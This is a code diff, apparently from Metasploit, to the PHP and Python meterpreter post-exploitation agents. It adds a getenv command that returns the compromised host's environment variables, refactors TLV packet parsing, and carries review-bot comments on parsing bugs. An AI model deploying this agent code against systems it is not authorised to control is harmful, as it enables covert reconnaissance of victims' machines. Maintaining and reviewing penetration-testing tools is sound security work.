@@ -538,13 +546,13 @@ function stdapi_fs_sha1($req, &$pkt) { $path_tlv = packet_get_tlv($req, TLV_TYPE_FILE_PATH); $path = cononicalize_path($path_tlv['value']); - if (is_callable("sha1_file")) { - $sha1 = sha1_file($path); - } else { - $sha1 = sha1(file_get_contents($path)); - } - $sha1 = pack("H*", $sha1); - # Ghetto abuse of file name type to indicate the sha1 result + if (is_callable("sha1_file")) { + $sha1 = sha1_file($path); + } else { + $sha1 = sha1(file_get_contents($path)); + } + $sha1 = pack("H*", $sha1); + # Ghetto abuse of file name type to indicate the sha1 result packet_add_tlv($pkt, create_tlv(TLV_TYPE_FILE_NAME, $sha1)); return ERROR_SUCCESS; } @@ -573,6 +581,41 @@ function stdapi_sys_config_getuid($req, &$pkt) { } } +if (!function_exists('stdapi_sys_config_getenv')) { +register_command('stdapi_sys_config_getenv'); +function stdapi_sys_config_getenv($req, &$pkt) { + my_print("doing getenv"); + + $variable_tlvs = packet_get_all_tlvs($req, TLV_TYPE_ENV_VARIABLE); + + # If we decide some day to have sys.config.getenv return all env + # vars when given an empty search list, this is one way to do it. + #if (empty($variable_tlvs)) { + # # We don't have a var to look up, return all of 'em + # $variables = array_keys($_SERVER); + #} else { + # $variables = array(); + # foreach ($variable_tlvs as $tlv) { + # array_push($variables, $tlv['value']); + # } + #} + + foreach ($variable_tlvs as $name) { + $canonical_name = str_replace(array("$","%"), "", $name['value']); + $env = getenv($canonical_name); + if ($env !== FALSE) { + $grp = ""; + $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VARIABLE, $canonical_name)); + $grp .= tlv_pack(create_tlv(TLV_TYPE_ENV_VALUE, $env)); + packet_add_tlv($pkt, create_tlv(TLV_TYPE_ENV_GROUP, $grp)); + } + } + + return ERROR_SUCCESS; +} +} + + # Unimplemented becuase it's unimplementable #if (!function_exists('stdapi_sys_config_rev2self')) { #register_command('stdapi_sys_config_rev2self'); 
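Review bot: The commented-out `#if (empty($variable_tlvs))` block inside `stdapi_sys_config_getenv` is dead code kept as a design note; either drop it or collapse it to one line such as `# TODO: an empty variable list could return every env var (array_keys($_SERVER))`. `str_replace(array("$","%"), "", $name['value'])` strips `$` and `%` from anywhere in the name rather than only the `$VAR` / `%VAR%` sigils, so a name with a literal `$` or `%` in the middle is silently rewritten; `trim($name['value'], '$%')` would strip just the surrounding sigils, if that is what the other stdapi implementations do. Names that are not set produce no ENV_GROUP at all, which is presumably how the client distinguishes "unset" from "empty" (`getenv` returns `""` for an empty value and `FALSE` for an unset one, and `!== FALSE` keeps the empty case); that deserves a comment on the `if ($env !== FALSE)` line, e.g. `# unset vars are omitted; set-but-empty vars are reported with an empty value`.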
@@ -696,24 +739,24 @@ function close_process($proc) { foreach ($proc['pipes'] as $f) { @fclose($f); } - if (is_callable('proc_get_status')) { - $status = proc_get_status($proc['handle']); - } else { - # fake a running process on php < 4.3 - $status = array('running' => true); - } + if (is_callable('proc_get_status')) { + $status = proc_get_status($proc['handle']); + } else { + # fake a running process on php < 4.3 + $status = array('running' => true); + } - # proc_close blocks waiting for the child to exit, so if it's still - # running, don't take a chance on deadlock and just sigkill it if we - # can. We can't on php < 4.3, so don't do anything. This will leave - # zombie processes, but that's better than deadlock. - if ($status['running'] == false) { - proc_close($proc['handle']); - } else { - if (is_callable('proc_terminate')) { - proc_terminate($proc['handle'], 9); - } - } + # proc_close blocks waiting for the child to exit, so if it's still + # running, don't take a chance on deadlock and just sigkill it if we + # can. We can't on php < 4.3, so don't do anything. This will leave + # zombie processes, but that's better than deadlock. + if ($status['running'] == false) { + proc_close($proc['handle']); + } else { + if (is_callable('proc_terminate')) { + proc_terminate($proc['handle'], 9); + } + } if (array_key_exists('cid', $proc) && $channel_process_map[$proc['cid']]) { unset($channel_process_map[$proc['cid']]); } diff --git a/data/meterpreter/ext_server_stdapi.py b/data/meterpreter/ext_server_stdapi.py index b64b7278e4..b6bdccd483 100644 --- a/data/meterpreter/ext_server_stdapi.py +++ b/data/meterpreter/ext_server_stdapi.py 
@@ -86,170 +86,185 @@ TLV_META_TYPE_MASK = (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
 #
 # TLV Specific Types
 #
-TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
-TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
-TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
-TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
-TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
+TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0
+TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1
+TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2
+TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3
+TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4
-TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
-TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
-TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
+TLV_TYPE_STRING = TLV_META_TYPE_STRING | 10
+TLV_TYPE_UINT = TLV_META_TYPE_UINT | 11
+TLV_TYPE_BOOL = TLV_META_TYPE_BOOL | 12
-TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
-TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
-TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
+TLV_TYPE_LENGTH = TLV_META_TYPE_UINT | 25
+TLV_TYPE_DATA = TLV_META_TYPE_RAW | 26
+TLV_TYPE_FLAGS = TLV_META_TYPE_UINT | 27
-TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
-TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
-TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
-TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
-TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
+TLV_TYPE_CHANNEL_ID = TLV_META_TYPE_UINT | 50
+TLV_TYPE_CHANNEL_TYPE = TLV_META_TYPE_STRING | 51
+TLV_TYPE_CHANNEL_DATA = TLV_META_TYPE_RAW | 52
+TLV_TYPE_CHANNEL_DATA_GROUP = TLV_META_TYPE_GROUP | 53
+TLV_TYPE_CHANNEL_CLASS = TLV_META_TYPE_UINT | 54
 ##
 # General
 ##
-TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
-TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
-TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
-TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
+TLV_TYPE_HANDLE = TLV_META_TYPE_UINT | 600
+TLV_TYPE_INHERIT = TLV_META_TYPE_BOOL | 601
+TLV_TYPE_PROCESS_HANDLE = TLV_META_TYPE_UINT | 630
+TLV_TYPE_THREAD_HANDLE = TLV_META_TYPE_UINT | 631
 ##
 # Fs
 ##
-TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
-TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
-TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
-TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
-TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
+TLV_TYPE_DIRECTORY_PATH = TLV_META_TYPE_STRING | 1200
+TLV_TYPE_FILE_NAME = TLV_META_TYPE_STRING | 1201
+TLV_TYPE_FILE_PATH = TLV_META_TYPE_STRING | 1202
+TLV_TYPE_FILE_MODE = TLV_META_TYPE_STRING | 1203
+TLV_TYPE_FILE_SIZE = TLV_META_TYPE_UINT | 1204
-TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
+TLV_TYPE_STAT_BUF = TLV_META_TYPE_COMPLEX | 1220
-TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
-TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
-TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
-TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
+TLV_TYPE_SEARCH_RECURSE = TLV_META_TYPE_BOOL | 1230
+TLV_TYPE_SEARCH_GLOB = TLV_META_TYPE_STRING | 1231
+TLV_TYPE_SEARCH_ROOT = TLV_META_TYPE_STRING | 1232
+TLV_TYPE_SEARCH_RESULTS = TLV_META_TYPE_GROUP | 1233
 ##
 # Net
 ##
-TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
-TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
+TLV_TYPE_HOST_NAME = TLV_META_TYPE_STRING | 1400
+TLV_TYPE_PORT = TLV_META_TYPE_UINT | 1401
-TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
-TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
-TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
-TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
+TLV_TYPE_SUBNET = TLV_META_TYPE_RAW | 1420
+TLV_TYPE_NETMASK = TLV_META_TYPE_RAW | 1421
+TLV_TYPE_GATEWAY = TLV_META_TYPE_RAW | 1422
+TLV_TYPE_NETWORK_ROUTE = TLV_META_TYPE_GROUP | 1423
-TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
-TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
-TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
-TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
+TLV_TYPE_IP = TLV_META_TYPE_RAW | 1430
+TLV_TYPE_MAC_ADDRESS = TLV_META_TYPE_RAW | 1431
+TLV_TYPE_MAC_NAME = TLV_META_TYPE_STRING | 1432
+TLV_TYPE_NETWORK_INTERFACE = TLV_META_TYPE_GROUP | 1433
-TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
-TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
-TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
-TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
-TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
+TLV_TYPE_SUBNET_STRING = TLV_META_TYPE_STRING | 1440
+TLV_TYPE_NETMASK_STRING = TLV_META_TYPE_STRING | 1441
+TLV_TYPE_GATEWAY_STRING = TLV_META_TYPE_STRING | 1442
+TLV_TYPE_ROUTE_METRIC = TLV_META_TYPE_UINT | 1443
+TLV_TYPE_ADDR_TYPE = TLV_META_TYPE_UINT | 1444
+##
 # Socket
-TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
-TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
-TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
-TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
-TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
+##
+TLV_TYPE_PEER_HOST = TLV_META_TYPE_STRING | 1500
+TLV_TYPE_PEER_PORT = TLV_META_TYPE_UINT | 1501
+TLV_TYPE_LOCAL_HOST = TLV_META_TYPE_STRING | 1502
+TLV_TYPE_LOCAL_PORT = TLV_META_TYPE_UINT | 1503
+TLV_TYPE_CONNECT_RETRIES = TLV_META_TYPE_UINT | 1504
-TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
+TLV_TYPE_SHUTDOWN_HOW = TLV_META_TYPE_UINT | 1530
+##
 # Registry
-TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
-TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
-TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
-TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
-TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
-TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
-TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
-TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
-TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
+##
+TLV_TYPE_HKEY = TLV_META_TYPE_UINT | 1000
+TLV_TYPE_ROOT_KEY = TLV_TYPE_HKEY
+TLV_TYPE_BASE_KEY = TLV_META_TYPE_STRING | 1001
+TLV_TYPE_PERMISSION = TLV_META_TYPE_UINT | 1002
+TLV_TYPE_KEY_NAME = TLV_META_TYPE_STRING | 1003
+TLV_TYPE_VALUE_NAME = TLV_META_TYPE_STRING | 1010
+TLV_TYPE_VALUE_TYPE = TLV_META_TYPE_UINT | 1011
+TLV_TYPE_VALUE_DATA = TLV_META_TYPE_RAW | 1012
+TLV_TYPE_TARGET_HOST = TLV_META_TYPE_STRING | 1013
+##
 # Config
-TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
-TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
-TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
-TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
+##
+TLV_TYPE_COMPUTER_NAME = TLV_META_TYPE_STRING | 1040
+TLV_TYPE_OS_NAME = TLV_META_TYPE_STRING | 1041
+TLV_TYPE_USER_NAME = TLV_META_TYPE_STRING | 1042
+TLV_TYPE_ARCHITECTURE = TLV_META_TYPE_STRING | 1043
+
+##
+# Environment
+##
+TLV_TYPE_ENV_VARIABLE = TLV_META_TYPE_STRING | 1100
+TLV_TYPE_ENV_VALUE = TLV_META_TYPE_STRING | 1101
+TLV_TYPE_ENV_GROUP = TLV_META_TYPE_GROUP | 1102
 DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
+##
 # Process
-TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
-TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
-TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
-TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
-TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
-TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
-TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
-TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
-TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
-TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
-TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
-TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
-TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
-TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
-TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
-TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
-TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
+##
+TLV_TYPE_BASE_ADDRESS = TLV_META_TYPE_UINT | 2000
+TLV_TYPE_ALLOCATION_TYPE = TLV_META_TYPE_UINT | 2001
+TLV_TYPE_PROTECTION = TLV_META_TYPE_UINT | 2002
+TLV_TYPE_PROCESS_PERMS = TLV_META_TYPE_UINT | 2003
+TLV_TYPE_PROCESS_MEMORY = TLV_META_TYPE_RAW | 2004
+TLV_TYPE_ALLOC_BASE_ADDRESS = TLV_META_TYPE_UINT | 2005
+TLV_TYPE_MEMORY_STATE = TLV_META_TYPE_UINT | 2006
+TLV_TYPE_MEMORY_TYPE = TLV_META_TYPE_UINT | 2007
+TLV_TYPE_ALLOC_PROTECTION = TLV_META_TYPE_UINT | 2008
+TLV_TYPE_PID = TLV_META_TYPE_UINT | 2300
+TLV_TYPE_PROCESS_NAME = TLV_META_TYPE_STRING | 2301
+TLV_TYPE_PROCESS_PATH = TLV_META_TYPE_STRING | 2302
+TLV_TYPE_PROCESS_GROUP = TLV_META_TYPE_GROUP | 2303
+TLV_TYPE_PROCESS_FLAGS = TLV_META_TYPE_UINT | 2304
+TLV_TYPE_PROCESS_ARGUMENTS = TLV_META_TYPE_STRING | 2305
+TLV_TYPE_PROCESS_ARCH = TLV_META_TYPE_UINT | 2306
+TLV_TYPE_PARENT_PID = TLV_META_TYPE_UINT | 2307
-TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
-TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
-TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
-TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
-TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
-TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
-TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
+TLV_TYPE_IMAGE_FILE = TLV_META_TYPE_STRING | 2400
+TLV_TYPE_IMAGE_FILE_PATH = TLV_META_TYPE_STRING | 2401
+TLV_TYPE_PROCEDURE_NAME = TLV_META_TYPE_STRING | 2402
+TLV_TYPE_PROCEDURE_ADDRESS = TLV_META_TYPE_UINT | 2403
+TLV_TYPE_IMAGE_BASE = TLV_META_TYPE_UINT | 2404
+TLV_TYPE_IMAGE_GROUP = TLV_META_TYPE_GROUP | 2405
+TLV_TYPE_IMAGE_NAME = TLV_META_TYPE_STRING | 2406
-TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
-TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
-TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
-TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
-TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
-TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
+TLV_TYPE_THREAD_ID = TLV_META_TYPE_UINT | 2500
+TLV_TYPE_THREAD_PERMS = TLV_META_TYPE_UINT | 2502
+TLV_TYPE_EXIT_CODE = TLV_META_TYPE_UINT | 2510
+TLV_TYPE_ENTRY_POINT = TLV_META_TYPE_UINT | 2511
+TLV_TYPE_ENTRY_PARAMETER = TLV_META_TYPE_UINT | 2512
+TLV_TYPE_CREATION_FLAGS = TLV_META_TYPE_UINT | 2513
-TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
-TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
-TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
-TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
+TLV_TYPE_REGISTER_NAME = TLV_META_TYPE_STRING | 2540
+TLV_TYPE_REGISTER_SIZE = TLV_META_TYPE_UINT | 2541
+TLV_TYPE_REGISTER_VALUE_32 = TLV_META_TYPE_UINT | 2542
+TLV_TYPE_REGISTER = TLV_META_TYPE_GROUP | 2550
 ##
 # Ui
 ##
-TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
-TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
-TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
+TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
+TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
+TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
 ##
 # Event Log
 ##
-TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
-TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
-TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
+TLV_TYPE_EVENT_SOURCENAME = TLV_META_TYPE_STRING | 4000
+TLV_TYPE_EVENT_HANDLE = TLV_META_TYPE_UINT | 4001
+TLV_TYPE_EVENT_NUMRECORDS = TLV_META_TYPE_UINT | 4002
-TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
-TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
+TLV_TYPE_EVENT_READFLAGS = TLV_META_TYPE_UINT | 4003
+TLV_TYPE_EVENT_RECORDOFFSET = TLV_META_TYPE_UINT | 4004
-TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
-TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
-TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
-TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
-TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
-TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
-TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
-TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
+TLV_TYPE_EVENT_RECORDNUMBER = TLV_META_TYPE_UINT | 4006
+TLV_TYPE_EVENT_TIMEGENERATED = TLV_META_TYPE_UINT | 4007
+TLV_TYPE_EVENT_TIMEWRITTEN = TLV_META_TYPE_UINT | 4008
+TLV_TYPE_EVENT_ID = TLV_META_TYPE_UINT | 4009
+TLV_TYPE_EVENT_TYPE = TLV_META_TYPE_UINT | 4010
+TLV_TYPE_EVENT_CATEGORY = TLV_META_TYPE_UINT | 4011
+TLV_TYPE_EVENT_STRING = TLV_META_TYPE_STRING | 4012
+TLV_TYPE_EVENT_DATA = TLV_META_TYPE_RAW | 4013
 ##
 # Power
 ##
-TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
-TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
+TLV_TYPE_POWER_FLAGS = TLV_META_TYPE_UINT | 4100
+TLV_TYPE_POWER_REASON = TLV_META_TYPE_UINT | 4101
 ##
 # Sys
@@ -367,6 +382,18 @@ def stdapi_sys_config_getuid(request, response):
 response += tlv_pack(TLV_TYPE_USER_NAME, getpass.getuser())
 return ERROR_SUCCESS, response
+@meterpreter.register_function
+def stdapi_sys_config_getenv(request, response):
+ for env_var in packet_enum_tlvs(request, TLV_TYPE_ENV_VARIABLE):
+ pgroup = ''
+ env_var = env_var['value'].translate(None, '%$')
+ env_val = os.environ.get(env_var)
+ if env_val:
+ pgroup += tlv_pack(TLV_TYPE_ENV_VARIABLE, env_var)
+ pgroup += tlv_pack(TLV_TYPE_ENV_VALUE, env_val)
+ response += tlv_pack(TLV_TYPE_ENV_GROUP, pgroup)
+ return ERROR_SUCCESS, response
+
 @meterpreter.register_function
 def stdapi_sys_config_sysinfo(request, response):
 uname_info = platform.uname()
diff --git a/data/meterpreter/ext_server_stdapi.x64.dll b/data/meterpreter/ext_server_stdapi.x64.dll
index 56eedf98f0..8c539121e9 100755
Binary files a/data/meterpreter/ext_server_stdapi.x64.dll and b/data/meterpreter/ext_server_stdapi.x64.dll differ
diff --git a/data/meterpreter/ext_server_stdapi.x86.dll b/data/meterpreter/ext_server_stdapi.x86.dll
index f013ccfc5e..0aa9e3f520 100755
Binary files a/data/meterpreter/ext_server_stdapi.x86.dll and b/data/meterpreter/ext_server_stdapi.x86.dll differ
diff --git a/data/meterpreter/meterpreter.php b/data/meterpreter/meterpreter.php
index f378732436..c33885d901 100755
--- a/data/meterpreter/meterpreter.php
+++ b/data/meterpreter/meterpreter.php
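Review bot: `if env_val:` in the new `stdapi_sys_config_getenv` drops any variable whose value is the empty string, because `os.environ.get()` returns `''` for a set-but-empty variable and `None` only when the name is absent; the PHP port in this same commit keeps such variables (`!== FALSE`), so the two agents answer the same request differently. Use `if env_val is not None:` so an empty value is reported as empty rather than as missing. `env_var['value'].translate(None, '%$')` is the Python 2 `str.translate` signature and raises under Python 3; if this extension is meant to run on both, `.replace('%', '').replace('$', '')` does the same stripping portably — I cannot tell from the hunk which interpreter versions are targeted.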
@@ -680,6 +680,30 @@ function tlv_pack($tlv) {
 return $ret;
 }
+function tlv_unpack($raw_tlv) {
+ $tlv = unpack("Nlen/Ntype", substr($raw_tlv, 0, 8));
+ $type = $tlv['type'];
+ my_print("len: {$tlv['len']}, type: {$tlv['type']}");
+ if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
+ $tlv = unpack("Nlen/Ntype/a*value", substr($raw_tlv, 0, $tlv['len']));
+ }
+ elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
+ $tlv = unpack("Nlen/Ntype/Nvalue", substr($raw_tlv, 0, $tlv['len']));
+ }
+ elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
+ $tlv = unpack("Nlen/Ntype/cvalue", substr($raw_tlv, 0, $tlv['len']));
+ }
+ elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
+ $tlv = unpack("Nlen/Ntype", $raw_tlv);
+ $tlv['value'] = substr($raw_tlv, 8, $tlv['len']-8);
+ }
+ else {
+ my_print("Wtf type is this? $type");
+ $tlv = null;
+ }
+ return $tlv;
+}
+
 function packet_add_tlv(&$pkt, $tlv) {
 $pkt .= tlv_pack($tlv);
 }
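Review bot: `tlv_unpack` takes `len` straight from the wire and never checks it against `strlen($raw_tlv)` or the 8-byte header minimum, so a truncated or malformed entry reaches the branch bodies: with `len < 8` the RAW branch's `substr($raw_tlv, 8, $tlv['len']-8)` is handed a negative length, which PHP treats as "drop that many bytes from the end", and the value becomes an unrelated slice of the rest of the packet; with fewer than 8 bytes available the first `unpack` fails with a warning and `$tlv['type']` is read from `false`, falling into the `else` only by accident. Add `if (strlen($raw_tlv) < 8) { return null; }` at the top and `if ($tlv['len'] < 8 || $tlv['len'] > strlen($raw_tlv)) { return null; }` right after the header is read, so every later `substr` is bounded. The final `else` also returns `null` for any meta type other than string/uint/bool/raw — group and complex TLVs — so a caller walking a packet loses the length it needs to step over such an entry; returning the header with `$tlv['value'] = null` would keep the walk possible. The unconditional `my_print` is now executed for every entry of every packet, which is a lot of noise for a parser hot path.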
@@ -689,27 +713,10 @@ function packet_get_tlv($pkt, $type) {
 # Start at offset 8 to skip past the packet header
 $offset = 8;
 while ($offset < strlen($pkt)) {
- $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
+ $tlv = tlv_unpack(substr($pkt, $offset));
 #my_print("len: {$tlv['len']}, type: {$tlv['type']}");
 if ($type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
 #my_print("Found one at offset $offset");
- if (($type & TLV_META_TYPE_STRING) == TLV_META_TYPE_STRING) {
- $tlv = unpack("Nlen/Ntype/a*value", substr($pkt, $offset, $tlv['len']));
- }
- elseif (($type & TLV_META_TYPE_UINT) == TLV_META_TYPE_UINT) {
- $tlv = unpack("Nlen/Ntype/Nvalue", substr($pkt, $offset, $tlv['len']));
- }
- elseif (($type & TLV_META_TYPE_BOOL) == TLV_META_TYPE_BOOL) {
- $tlv = unpack("Nlen/Ntype/cvalue", substr($pkt, $offset, $tlv['len']));
- }
- elseif (($type & TLV_META_TYPE_RAW) == TLV_META_TYPE_RAW) {
- $tlv = unpack("Nlen/Ntype", substr($pkt, $offset, 8));
- $tlv['value'] = substr($pkt, $offset+8, $tlv['len']-8);
- }
- else {
- my_print("Wtf type is this? $type");
- $tlv = null;
- }
 return $tlv;
 }
 $offset += $tlv['len'];
@@ -719,6 +726,27 @@ function packet_get_tlv($pkt, $type) {
 }
+function packet_get_all_tlvs($pkt, $type) {
+ my_print("Looking for all tlvs of type $type");
+ # Start at offset 8 to skip past the packet header
+ $offset = 8;
+ $all = array();
+ while ($offset < strlen($pkt)) {
+ $tlv = tlv_unpack(substr($pkt, $offset));
+ if ($tlv == NULL) {
+ break;
+ }
+ my_print("len: {$tlv['len']}, type: {$tlv['type']}");
+ if (empty($type) || $type == ($tlv['type'] & ~TLV_META_TYPE_COMPRESSED)) {
+ my_print("Found one at offset $offset");
+ array_push($all, $tlv);
+ }
+ $offset += $tlv['len'];
+ }
+ return $all;
+}
+
+
 ##
 # Functions for genericizing the stream/socket conundrum
 ##
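Review bot: After the refactor `packet_get_tlv` never checks what `tlv_unpack` returned, and `tlv_unpack` returns `null` for any meta type it does not recognise, whereas the removed code only did the typed unpack on the entry that matched `$type` and stepped over everything else using the raw 8-byte header. If a request ever carries an entry of another meta type — a group TLV, say — ahead of the one being searched for, `$tlv['type']` and `$tlv['len']` are read from `null`, `$offset += $tlv['len']` adds nothing, and the `while` loop never terminates. Guard the result right after the call, `if ($tlv == NULL || $tlv['len'] < 8) { break; }`, so an unparseable or zero-length entry ends the scan instead of pinning the agent; the `len < 8` half also closes the pre-existing case where a zero-length TLV left `$offset` unchanged. What `packet_get_tlv` returns when nothing matches lies outside this hunk.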
